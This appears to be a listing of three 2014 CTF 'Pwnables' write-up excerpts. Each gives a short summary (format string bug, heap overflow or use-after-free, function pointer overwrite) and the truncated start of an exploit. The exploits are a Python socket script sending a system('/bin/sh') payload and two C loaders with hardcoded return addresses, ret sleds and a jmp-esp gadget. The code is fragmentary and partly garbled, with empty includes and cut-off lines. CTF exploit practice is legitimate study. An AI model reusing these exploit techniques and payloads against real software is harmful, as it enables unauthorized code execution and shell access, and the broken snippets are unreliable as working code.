Category : Pwnables Summary : make failure chdir(), get admin password, 13byte fsb Exploit#!/usr/bin/pythonfrom socket import *from struct import pack,unpack p = lambda x:pack("value")num = ((stack&0x0000ffff) - 4)-926payload = ""payload += p(system_addr)payload += "aaaa"payload += p(system_arg) s.send("4\n")s.recv(1024) s.send("1\n")s.recv(1024)s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/s..
CTF/2014
Category : Pwnables Summary : overwrite function pointer in heap by heap overflow or use-after-free, lift esp + ret sleding loader.c#include #define RET "\x37\x93\x04\x08"#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET#define EXECL "\x40\x2e\x0f\x40"//#define EXECL "\x50\x24\x0f\x40"#define BINARY "\x74\x81\x04..
Category : Pwnables Summary : clear game, overwrite any 4byte memory except 0x0804XXXX, _exit calls %gs + 0x14, lift esp + ret sleding loader.c#include #define RET "\x20\x99\x04\x08" // 0x08049920 retn#define RET16 RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET RET #define JMPESP "\x7d\x2a\x08\x40" // 0x40082a7d: jmp *%esp#defi..
